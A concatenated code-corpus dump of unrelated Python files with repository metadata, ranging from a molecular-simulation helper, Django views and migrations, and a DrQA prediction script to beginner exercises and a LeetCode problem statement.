# class PairUnbinding(BoundaryCondition):
# pass
class LennardJonesPairOpenMMSimMaker(OpenMMToolsTestSysSimMaker):
    """Sim maker for the openmmtools Lennard-Jones pair test system,
    wired with a pair-separation distance metric and an unbinding
    boundary condition."""

    TEST_SYS = LennardJonesPair

    BCS = OpenMMToolsTestSysSimMaker.BCS + [UnbindingBC]

    # particle 0 plays the ligand, particle 1 the receptor
    LIGAND_IDXS = [0]
    RECEPTOR_IDXS = [1]

    UNBINDING_BC_DEFAULTS = {
        'cutoff_distance': 1.0,  # nm
        'periodic': False,
    }

    # BUGFIX: copy the parent's mapping before extending it.  The original
    # aliased OpenMMToolsTestSysSimMaker.DEFAULT_BC_PARAMS and then called
    # .update() on it, mutating the parent class's dict as a side effect.
    DEFAULT_BC_PARAMS = dict(OpenMMToolsTestSysSimMaker.DEFAULT_BC_PARAMS)
    DEFAULT_BC_PARAMS.update(
        {
            'UnbindingBC': UNBINDING_BC_DEFAULTS,
        }
    )

    def make_bc(self, bc_class, bc_params):
        """Construct a boundary condition, injecting the extra arguments
        UnbindingBC needs (distance metric, initial state, topology and
        the ligand/receptor selections)."""
        if bc_class == UnbindingBC:
            bc_params.update(
                {
                    'distance': self.distance,
                    'initial_state': self.init_state,
                    'topology': self.json_top(),
                    'ligand_idxs': self.LIGAND_IDXS,
                    'receptor_idxs': self.RECEPTOR_IDXS,
                }
            )
        bc = bc_class(**bc_params)
        return bc

    def __init__(self):
        """Build the LJ pair test system and initialize the base sim maker."""
        # must set this here since we need it to generate the state;
        # the superclass __init__ will set it again later
        self.getState_kwargs = dict(GET_STATE_KWARG_DEFAULTS)
        if self.GET_STATE_KWARGS is not None:
            self.getState_kwargs.update(self.GET_STATE_KWARGS)

        test_sys = LennardJonesPair()
        init_state = self.make_state(test_sys.system, test_sys.positions)

        super().__init__(
            distance=PairDistance(),
            init_state=init_state,
            system=test_sys.system,
            topology=test_sys.topology,
        )
| [
"samuel.lotz@salotz.info"
] | samuel.lotz@salotz.info |
31bb29a5c07f4c3feb4ecfe83bfab2823b6a4cfd | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/google/educative/dp/8_count_palindromic_substrings.py | 52508c3007719253316bfe8c5f1b6816f8bdfaa4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py |
def count_palindromic_substrings(s):
    """Count the palindromic substrings of s (every occurrence counts).

    Expands around each of the 2*n - 1 possible palindrome centers
    (every character and every gap between characters), which is O(n^2)
    instead of the original O(n^3) check-every-substring scan.
    """
    n = len(s)
    count = 0
    for center in range(2 * n - 1):
        left = center // 2
        right = left + center % 2  # odd centers sit on a gap
        while left >= 0 and right < n and s[left] == s[right]:
            count += 1
            left -= 1
            right += 1
    return count
"schandra2@godaddy.com"
] | schandra2@godaddy.com |
86d5c1b6dd0df2f209c9cc42fc7d9348c3668873 | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /test/python/WMComponent_t/JobAccountant_t/fwjrs/genheritagetest.py | 9a7a0a40d5bd27ceeb6ac7e078d5084b139e9fea | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | #!/usr/bin/env python
import random
from WMCore.FwkJobReport import Report
from WMCore.DataStructs.Run import Run
from WMCore.Services.UUID import makeUUID
outputModules = ["outputModule1", "outputModule2", "outputModule3",
"outputModule4", "outputModule5", "outputModule6",
"outputModule7", "outputModule8", "outputModule9",
"outputModule10"]
runInfo = Run(1)
runInfo.lumis.extend([11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40])
totalReports = 25
inputFilesPerReport = 50
inputFileCounter = 0
for i in range(totalReports):
loadTestReport = Report.Report("cmsRun1")
loadTestReport.addInputSource("PoolSource")
for j in range(inputFilesPerReport):
inputFile = loadTestReport.addInputFile("PoolSource", lfn = "input%i" % inputFileCounter,
events = 600000, size = 600000)
inputFileCounter += 1
Report.addRunInfoToFile(inputFile, runInfo)
for outputModule in outputModules:
loadTestReport.addOutputModule(outputModule)
datasetInfo = {"applicationName": "cmsRun", "applicationVersion": "CMSSW_3_3_5_patch3",
"primaryDataset": outputModule, "dataTier": "RAW",
"processedDataset": "LoadTest10"}
fileAttrs = {"lfn": makeUUID(), "location": "cmssrm.fnal.gov",
"checksums": {"adler32": "ff810ec3", "cksum": "2212831827"},
"events": random.randrange(500, 5000, 50),
"merged": True,
"size": random.randrange(1000, 2000, 100000000),
"module_label": outputModule, "dataset": datasetInfo}
outputFile = loadTestReport.addOutputFile(outputModule, fileAttrs)
Report.addRunInfoToFile(outputFile, runInfo)
loadTestReport.persist("HeritageTest%02d.pkl" % i)
| [
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
4d19b71617a5f44cb851d027f2be980d24ad3002 | f6c7084f91434566a9aa1b821d2739edede036f8 | /CreateVariable/DeclGlobalVariable.py | 7835a187bcd4fd36206b75f1ee423dc44fc31e90 | [] | no_license | GANESH0080/Python-WorkPlace | 87fc3776e693d254661c476bfe977c696d087276 | 43196086bee26cbeae25fb7bbacb8dbbde85d648 | refs/heads/master | 2020-09-20T03:45:13.824696 | 2019-11-27T07:27:17 | 2019-11-27T07:27:17 | 224,369,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | i = 50
# NOTE(review): the initial `i = 50` assignment was fused into the dump's
# metadata row above this line.
print(i)
def demofunction():
# `global` makes the assignment below rebind the module-level `i`
# instead of creating a function-local variable.
global i
print(i)
i = "Hi Ganesh Salunkhe"
# Prints 50 (the global), then rebinds it; the final print shows the string.
demofunction()
print(i)
| [
"ganusalunkhe@gmail.com"
] | ganusalunkhe@gmail.com |
420668d0471ddfbafbaf0dad7310591ab306d6a3 | a66b69c3f9da9779ae80f347b61f47e3bc5ba145 | /day1011/listex02.py | b3ea0e6ba188c71120e4efb0096c38079bc66870 | [] | no_license | kyungtae92/python-basic | c841d9c9c6196b01da3de007c1298fe2c4b8f693 | 80a2051e37b6e87c9dbfd332c4b2946089ff0d5c | refs/heads/master | 2020-11-25T08:01:22.156661 | 2019-12-17T08:25:38 | 2019-12-17T08:25:38 | 228,567,120 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # 리스트 문자열에서 인덱스를 이용한 출력
text = "Will is power"
print(text[0], text[3], text[-1])
flist = ["apple", "banana", "tomato", "peach", "pear"]
print(flist[0], flist[3], flist[-1])
# 리스트 또는 문자열에서 슬라이싱에서 원하는 범위만큼 출력
sqr = [0,1,4,9,16,25,35,49]
print(sqr[3:6])
print(sqr[3:])
# 리스트 두개 합치기
marvel = ['스파이더맨', '토르', '아이언맨']
dc = ['슈퍼맨', '베트맨', '아쿠아맨']
heros = marvel + dc # 문자열 합치기
print(heros)
for name in heros:
print(name)
# 리스트를 연속적인 숫자만큼 추가하기
values = [1,2,3] * 3
print(values) | [
"noreply@github.com"
] | kyungtae92.noreply@github.com |
fda51d083f1d95aaab3c9623e46013c49c73c731 | 464d461e2c90724950cae9db0c4b72b55d82aab8 | /jumia/migrations/0008_healthbeautyscrape_kidsfashionscrape_menfashionscrape_womenfashionscrape.py | 3f2670f6ea77d1bac89cbfeb56a8c383c57531a2 | [
"MIT"
] | permissive | Kolaposki/Discoco | 47a1b4dde54612bf7b2adc372fc3ba8950f233af | 0a4d799c19639681e264e2d39f3a1c134d42d573 | refs/heads/master | 2023-05-24T19:46:08.713235 | 2022-07-25T05:32:20 | 2022-07-25T05:32:20 | 233,392,472 | 4 | 3 | null | 2023-05-22T22:40:50 | 2020-01-12T12:55:40 | JavaScript | UTF-8 | Python | false | false | 2,693 | py | # Generated by Django 3.0.1 on 2020-02-07 17:17
from django.db import migrations, models
class Migration(migrations.Migration):
# Auto-generated Django 3.0.1 migration: adds four structurally identical
# *Scrape tables for scraped deal listings (discount percent, product name,
# current/old price, unique product URL and image URL). Generated code --
# avoid hand edits beyond comments.
dependencies = [
('jumia', '0007_electronicsscrape_fashionscrape'),
]
operations = [
migrations.CreateModel(
name='HealthBeautyScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='KidsFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='MenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='WomenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
]
| [
"oshodikolapo@gmail.com"
] | oshodikolapo@gmail.com |
8cf61bd51098673db4e399337ad6541fee589be4 | 3973fa32d968b7ab2d1c8da29bffd2d1544151d3 | /scripts/pipeline/predict.py | 68aca425ac4f576611a9ed3afee48f71468e8091 | [
"BSD-3-Clause"
] | permissive | SBUNetSys/DeQA | 638e2fa21013bda5f254c75eb492418f4764d2c9 | 5baf2e151b8230dde3147d2a1e216a3e434375bb | refs/heads/master | 2020-06-19T21:18:07.047544 | 2019-07-14T19:48:00 | 2019-07-14T19:48:00 | 196,876,581 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,422 | py | #!/usr/bin/env python3
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Run predictions using the full DrQA retriever-reader pipeline."""
import argparse
import json
import logging
import os
import sys
import time
import torch
from drqa import pipeline, retriever, DATA_DIR
# ------------------------------------------------------------------------------
# Logging: timestamped messages to the console; DEBUG when -v is given.
# ------------------------------------------------------------------------------
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s.%(msecs)03d: [ %(message)s ]', '%m/%d/%Y_%H:%M:%S')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)

parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str)
parser.add_argument('--out-file', type=str, default=None,
                    help="path to write prediction file")
parser.add_argument('--reader-model', type=str, default=None,
                    help="Path to trained Document Reader model")
parser.add_argument('--normalize', action='store_true', help="Use normalized answer score")
parser.add_argument('--retriever-model', type=str, default=None,
                    help="Path to Document Retriever model (tfidf)")
parser.add_argument('--db_path', type=str, default=None,
                    help='Path to Document DB or index')
parser.add_argument('--n_docs', type=int, default=150,
                    help="Number of docs to retrieve per query")
parser.add_argument('--top_n', type=int, default=150,
                    help="Number of predictions to make per query")
parser.add_argument('--tokenizer', type=str, default='corenlp',
                    help=("String option specifying tokenizer type to use "
                          "(e.g. 'corenlp')"))
parser.add_argument('--no-cuda', action='store_true', help="Use CPU only")
parser.add_argument('--gpu', type=int, default=0,
                    help="Specify GPU device id to use")
parser.add_argument('--parallel', action='store_true',
                    help='Use data parallel (split across gpus)')
parser.add_argument('--num-workers', type=int, default=None,
                    help='Number of CPU processes (for tokenizing, etc)')
parser.add_argument('--batch-size', type=int, default=128,
                    help='Document paragraph batching size')
parser.add_argument('--predict-batch-size', type=int, default=1,
                    help='Question batching size')
parser.add_argument('--ranker', type=str, default='lucene')
parser.add_argument('--et_threshold', type=float, default=None,
                    help='early stopping threshold')
parser.add_argument('--et_model', type=str, default=None,
                    help='early stopping model')
parser.add_argument("-v", "--verbose", help="log more debug info", action="store_true")
args = parser.parse_args()
if args.verbose:
    logger.setLevel(logging.DEBUG)

t0 = time.time()
# log_filename = ('_'.join(sys.argv) + time.strftime("%Y%m%d-%H%M%S")).replace('/', '_')
# logfile = logging.FileHandler('/tmp/%s.log' % log_filename, 'w')
# logfile.setFormatter(fmt)
# logger.addHandler(logfile)
logger.info('COMMAND: python %s' % ' '.join(sys.argv))

args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
    torch.cuda.set_device(args.gpu)
    logger.info('CUDA enabled (GPU %d)' % args.gpu)
else:
    logger.info('Running on CPU only.')

# Pick the document ranker from the --ranker prefix:
# 's*' -> sql, 'l*' -> lucene, anything else -> tfidf.
if args.ranker.lower().startswith('s'):
    ranker = retriever.get_class('sql')(db_path=args.db_path)
elif args.ranker.lower().startswith('l'):
    ranker = retriever.get_class('lucene')(index_path=args.db_path)
else:
    ranker = retriever.get_class('tfidf')(tfidf_path=args.retriever_model, db_path=args.db_path)

logger.info('Initializing pipeline...')
DrQA = pipeline.DrQA(
    reader_model=args.reader_model,
    normalize=args.normalize,
    tokenizer=args.tokenizer,
    batch_size=args.batch_size,
    cuda=args.cuda,
    data_parallel=args.parallel,
    ranker=ranker,
    num_workers=args.num_workers,
    et_model=args.et_model,
    et_threshold=args.et_threshold
)

# ------------------------------------------------------------------------------
# Read in dataset and make predictions
# ------------------------------------------------------------------------------
logger.info('Loading queries from %s' % args.dataset)
queries = []
# BUGFIX: open the dataset in a `with` block so the handle is closed
# (the original iterated a bare open() and leaked the file object).
with open(args.dataset) as dataset_file:
    for line in dataset_file:
        data = json.loads(line)
        queries.append(data['question'])

model_name = os.path.splitext(os.path.basename(args.reader_model or 'default'))[0]
data_name = os.path.splitext(os.path.basename(args.dataset))[0]
outfile = args.out_file or os.path.join(DATA_DIR, '{}-{}.predictions.txt'.format(data_name, model_name))
out_dir = os.path.dirname(outfile)
os.makedirs(out_dir, exist_ok=True)
logger.info('Writing results to %s' % outfile)
with open(outfile, 'w') as f:
    batches = [queries[i: i + args.predict_batch_size]
               for i in range(0, len(queries), args.predict_batch_size)]
    for i, batch in enumerate(batches):
        batch_info = '-' * 5 + ' Batch %d/%d ' % (i + 1, len(batches)) + '-' * 5 + ' '
        # NOTE(review): queries[i] indexes by *batch* number; it only equals
        # this batch's first question when --predict-batch-size is 1 -- confirm.
        start_query = queries[i]
        logger.info(batch_info + start_query)
        predictions = DrQA.process(batch, n_docs=args.n_docs, top_n=args.top_n)
        for p in predictions:
            # sort each question's predictions by retrieval score, best first
            p = sorted(p, key=lambda k: k['doc_score'], reverse=True)
            f.write(json.dumps(p) + '\n')
logger.info('Total time: %.4f' % (time.time() - t0))
| [
"qqcao.cs@gmail.com"
] | qqcao.cs@gmail.com |
966807e614ac6bbe170a8ae017f3233ee5378d41 | 8130c34d546c323d6d5d2ca6b4a67330af08828f | /.history/menu_app/views_20210104163425.py | 0d705d9f471965254e8ff1766b6e951f8ca7ff08 | [] | no_license | lienusrob/final | ba2dad086fc97b21b537ef12df834dfadd222943 | f2726e31f1d51450e4aed8c74021c33679957b28 | refs/heads/master | 2023-02-15T01:36:54.463034 | 2021-01-07T12:47:05 | 2021-01-07T12:47:05 | 327,279,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py |
from .models import Cart, CartItem, MenuItem, ItemsCategory, Order, Orders, generate_order_id, Extras
from account_app.models import Profile
from .forms import AddToCartForm
from django.views.generic import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.utils import timezone
class MenuListView(ListView):
    """Generic class-based list view over all MenuItem rows."""

    model = MenuItem
    template_name = 'items/menu_list.html'
def menu_list_view(request):
    """Render the full menu together with its categories (main + side nav)."""
    context = {
        'item_list': MenuItem.objects.all(),
        'item_categories': reversed(ItemsCategory.objects.all()),
        'item_categories_side_nav': reversed(ItemsCategory.objects.all()),
    }
    return render(request, 'menu_app/menu_list.html', context)
def home(request):
    """Landing page listing every menu category."""
    context = {'category_menu': ItemsCategory.objects.all()}
    return render(request, 'homepage.html', context)
def menu_item_detail(request, **kwargs):
    """Detail page for one menu item, looked up by the `pk` keyword argument.

    `.first()` yields None (rather than raising) when the id is unknown.
    """
    item = MenuItem.objects.filter(id=kwargs.get('pk')).first()
    return render(request, 'menu_app/item_details.html', {'item': item})
def new_order_info(request):
    """Fetch (or start) the current user's open order and show its summary."""
    user_profile = get_object_or_404(Profile, user=request.user)
    order, created = Order.objects.get_or_create(
        customer=user_profile.user, is_ordered=False)
    if created:
        # a brand-new order gets a fresh reference code
        order.ref_code = generate_order_id()
        order.save()
    return render(request, 'items/order_info.html', {'order': order})
def cart(request):
    # NOTE(review): this definition is immediately shadowed by the second
    # `def cart` further down, so it is effectively dead code; kept intact
    # for interface stability.
    current_cart = Cart.objects.get(user=request.user, current=True)
    cart_items = CartItem.objects.filter(cart=current_cart)
    return render(request, 'menu_app/cart.html', {'cart_items': cart_items})
def menu_details(request, name):
    """List one category's menu items; on POST, save an add-to-cart form."""
    category = ItemsCategory.objects.get(name=name)
    items_in_category = MenuItem.objects.filter(category=category)
    context = {'menu_details': items_in_category,
               'category': name,
               'user': request.user}
    if request.method == "POST":
        form = AddToCartForm(request.POST or None)
        # NOTE(review): get_or_create returns an (obj, created) tuple and the
        # original assigns that tuple to form.cart unchanged -- confirm intent.
        form.cart = Cart.objects.get_or_create(user=request.user, current=True)
        form.save()
        #messages.success(request, "Item" "added to cart successfully!, please go to cart and check for items.")
    return render(request, ('menu_app/menu_list.html'), context)
def cart(request):
    """Show the current cart's items together with the available extras."""
    current_cart = Cart.objects.get(user=request.user, current=True)
    context = {
        'cart_items': CartItem.objects.filter(cart=current_cart),
        'extras': Extras.objects.all(),
    }
    return render(request, 'menu_app/cart.html', context)
def view_cart(request):
    """Render the session-cart contents page (template reads the session)."""
    return render(request, "cart.html")
def add_to_cart(request, id):
    """Add a quantity of the specified product to the session cart."""
    quantity = int(request.POST.get('quantity'))
    cart = request.session.get('cart', {})
    # One expression covers both branches of the original: a missing id
    # counts as 0 before the new quantity is added.
    cart[id] = int(cart.get(id, 0)) + quantity
    request.session['cart'] = cart
    return redirect('homepage')
def adjust_cart(request, id):
    """Set a product's quantity in the session cart; 0 or less removes it."""
    quantity = int(request.POST.get('quantity'))
    cart = request.session.get('cart', {})
    if quantity > 0:
        cart[id] = quantity
    else:
        # BUGFIX: pop with a default so removing an id that is no longer in
        # the cart (e.g. after a double submit) cannot raise KeyError
        cart.pop(id, None)
    request.session['cart'] = cart
    return redirect('view_cart')
def orders(request):
    """Finalize the current cart into an Orders record and start a new cart."""
    cart = Cart.objects.get(user=request.user, current=True)
    # BUGFIX: the original lookup `cart__pk__` (trailing dunder) is not a
    # valid Django field lookup; `cart__pk` is.
    cart_items = CartItem.objects.filter(cart__pk=cart.pk)
    if request.method == "POST":
        for key, value in request.POST.items():
            # BUGFIX: 'csrfmiddleweartoken' was a typo for the CSRF field name
            if key == "csrfmiddlewaretoken":
                continue
        # BUGFIX: `cart.current == False` was a no-op comparison, so the
        # cart was never actually closed before being saved.
        cart.current = False
        cart.date_ordered = timezone.now()
        cart.save()
        orders = Orders(cart=cart)
        orders.save()
        # open a fresh cart for the next purchase
        cart = Cart(user=request.user)
        cart.save()
    # NOTE(review): on a GET request `orders` is never bound, so this line
    # raises NameError exactly as the original did -- confirm intended flow.
    context = {'order': orders}
    return render(request, 'order_info.html', context)
| [
"lienus.rob@hotmail.de"
] | lienus.rob@hotmail.de |
e0650e53f4315a7ace0c0cd4c087506a4d2f209d | 1ff265ac6bdf43f5a859f357312dd3ff788804a6 | /lab_18_if_challenge.py | f421762b2c086de477f11ec2eed7e78cbab95eec | [] | no_license | sgriffith3/july_pyb | f1f493450ab4933a4443518863f772ad54865c26 | 5e06012ad436071416b95613ed46e972c46b0ff7 | refs/heads/master | 2022-11-19T04:58:41.632000 | 2020-07-17T19:46:44 | 2020-07-17T19:46:44 | 279,335,603 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | # Hurricane Rating System
import random


def categorize(wind_speed):
    """Return the Saffir-Simpson style label for a wind speed in mph."""
    if wind_speed >= 157:
        return "Cat 5"
    elif wind_speed >= 130:
        return "Cat 4"
    elif wind_speed >= 111:
        return "Cat 3"
    elif wind_speed >= 96:
        return "Cat 2"
    elif wind_speed >= 74:
        return "Cat 1"
    elif wind_speed >= 39:
        return "Tropical Storm"
    else:
        return "Tropical Depression"


storm = random.randint(1, 200)
print(storm)
print(categorize(storm))

# BUGFIX: the Cat 1-4 band is 74..156 mph; the original `storm <= 157`
# wrongly labelled a 157 mph (Cat 5) storm as "Cat 1, 2, 3, or 4".
if 74 <= storm <= 156:
    print("Cat 1, 2, 3, or 4")
else:
    print("Its not a Cat 1, 2, 3, or 4")
| [
"sgriffith@alta3.com"
] | sgriffith@alta3.com |
e8e1ffe845d61c38aad005af58ab3b94ba501715 | b227199eda4f1e894199c8a8f5e87c39df83af45 | /examples/tdd/tests/functional/test_users.py | 4160a2ee094794a0b20cd67104ddd644ad404cbb | [] | no_license | gabrielfalcao/tumbler | c8d67a8bfd4555ff0fe04f984017620ee320fe7f | 322976083b2c76286f98dcad445eb22b7665f24f | refs/heads/master | 2021-01-20T05:53:47.780517 | 2015-06-24T19:32:58 | 2015-06-24T19:32:58 | 29,232,813 | 3 | 0 | null | 2019-12-20T17:20:26 | 2015-01-14T07:33:42 | Python | UTF-8 | Python | false | false | 788 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from sure import scenario
from datetime import datetime
from freezegun import freeze_time
from tumbler.core import Web
from timeless.models import User
def prepare_db(context):
    """Scenario setup: build a Web app, register its models, create tables."""
    web = Web()
    context.web = web
    web.prepare_models()
    web.db.create_all()
def cleanup_db(context):
    """Scenario teardown: drop every table created for the test."""
    context.web.db.drop_all()
@freeze_time("2005-01-01")
@scenario(prepare_db, cleanup_db)
def test_create_user(context):
('Creating a user should work')
result = User.create(
email=u'bar@bar.com',
password='foobar'
)
result.to_dict().should.equal({
'date_added': datetime(2005, 1, 1, 0, 0),
'email': u'bar@bar.com',
'id': 1,
'name': None,
'password': u'foobar'
})
| [
"gabriel@nacaolivre.org"
] | gabriel@nacaolivre.org |
d2b6c214a809b88c7e0670089891752e488a98bf | 4e30d990963870478ed248567e432795f519e1cc | /ciscoisesdk/models/validators/v3_1_1/jsd_d0ee193cc65780af11ed96b1758755.py | b8fdbb93fe7fa8f08ca7035bf6c68d28a611e89f | [
"MIT"
] | permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 3,583 | py | # -*- coding: utf-8 -*-
"""Identity Services Engine registerNode data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755(object):
    """registerNode request schema definition.

    Auto-generated validator for the Identity Services Engine
    ``registerNode`` request body.  The JSON schema is compiled once at
    construction time (via fastjsonschema) so each call to
    :meth:`validate` is a cheap function invocation.
    """
    def __init__(self):
        super(JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755, self).__init__()
        # The .replace(...) strips the 16-space source indentation from the
        # triple-quoted literal before it is parsed as JSON; the resulting
        # schema requires every field listed under "required" below.
        self._validator = fastjsonschema.compile(json.loads(
            '''{
                "$schema": "http://json-schema.org/draft-04/schema#",
                "properties": {
                "allowCertImport": {
                "type": "boolean"
                },
                "fqdn": {
                "type": "string"
                },
                "password": {
                "type": "string"
                },
                "roles": {
                "items": {
                "enum": [
                "PrimaryAdmin",
                "PrimaryDedicatedMonitoring",
                "PrimaryMonitoring",
                "SecondaryAdmin",
                "SecondaryDedicatedMonitoring",
                "SecondaryMonitoring",
                "Standalone"
                ],
                "type": "string"
                },
                "type": "array"
                },
                "services": {
                "items": {
                "enum": [
                "DeviceAdmin",
                "PassiveIdentity",
                "Profiler",
                "SXP",
                "Session",
                "TC-NAC",
                "pxGrid",
                "pxGridCloud"
                ],
                "type": "string"
                },
                "type": "array"
                },
                "userName": {
                "type": "string"
                }
                },
                "required": [
                "allowCertImport",
                "fqdn",
                "password",
                "roles",
                "services",
                "userName"
                ],
                "type": "object"
                }'''.replace("\n" + ' ' * 16, '')
        ))

    def validate(self, request):
        """Validate *request* against the registerNode schema.

        Raises:
            MalformedRequest: if the request body does not conform to the
                schema; the message includes the offending request and the
                underlying fastjsonschema reason.
        """
        try:
            self._validator(request)
        except fastjsonschema.exceptions.JsonSchemaException as e:
            raise MalformedRequest(
                '{} is invalid. Reason: {}'.format(request, e.message)
            )
| [
"wastorga@altus.co.cr"
] | wastorga@altus.co.cr |
5b67a2791270a6af0fcb24d49ab43ac438bc7ae7 | 055f4cc4d565b33d76c1f87c0dfe02f67328a3c9 | /celery_snippet/celery_snippet/celery.py | b9d9290076e141092c5ad792b1ebf785e5120dec | [] | no_license | Sundarmax/python-celery-django | 0eb4ac38df69bcaa9fed4f7c3f28b1904bb21fcc | 3b0c47cee80056dae36d970a3ceb774f279548eb | refs/heads/master | 2023-04-02T14:47:01.628356 | 2021-04-08T10:23:41 | 2021-04-08T10:23:41 | 355,795,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, unicode_literals
import os
from celery import Celery

# Django's settings module must be set before the Celery app is configured,
# so that config_from_object() below can read the CELERY_* settings from it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'celery_snippet.settings')

app = Celery('celery_snippet')

# Pull every setting prefixed with "CELERY" from the Django settings module.
app.config_from_object('django.conf:settings', namespace='CELERY')

# Auto-discover tasks.py modules in all installed Django apps.
app.autodiscover_tasks()
| [
"sundar.info22@gmail.com"
] | sundar.info22@gmail.com |
c9efe071470bec0e0fd25716ccb12f14514f472e | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/928/original/928.minimize-malware-spread-ii.0.py | f3b1e244ce25969bd413823d5bb20f56702a671e | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 1,960 | py | #
# @lc app=leetcode id=928 lang=python3
#
# [928] Minimize Malware Spread II
#
# https://leetcode.com/problems/minimize-malware-spread-ii/description/
#
# algorithms
# Hard (38.10%)
# Total Accepted: 3K
# Total Submissions: 7.8K
# Testcase Example: '[[1,1,0],[1,1,0],[0,0,1]]\n[0,1]'
#
# (This problem is the same as Minimize Malware Spread, with the differences
# bolded.)
#
# In a network of nodes, each node i is directly connected to another node j if
# and only if graph[i][j] = 1.
#
# Some nodes initial are initially infected by malware. Whenever two nodes are
# directly connected and at least one of those two nodes is infected by
# malware, both nodes will be infected by malware. This spread of malware will
# continue until no more nodes can be infected in this manner.
#
# Suppose M(initial) is the final number of nodes infected with malware in the
# entire network, after the spread of malware stops.
#
# We will remove one node from the initial list, completely removing it and any
# connections from this node to any other node. Return the node that if
# removed, would minimize M(initial). If multiple nodes could be removed to
# minimize M(initial), return such a node with the smallest index.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: graph = [[1,1,0],[1,1,0],[0,0,1]], initial = [0,1]
# Output: 0
#
#
#
# Example 2:
#
#
# Input: graph = [[1,1,0],[1,1,1],[0,1,1]], initial = [0,1]
# Output: 1
#
#
#
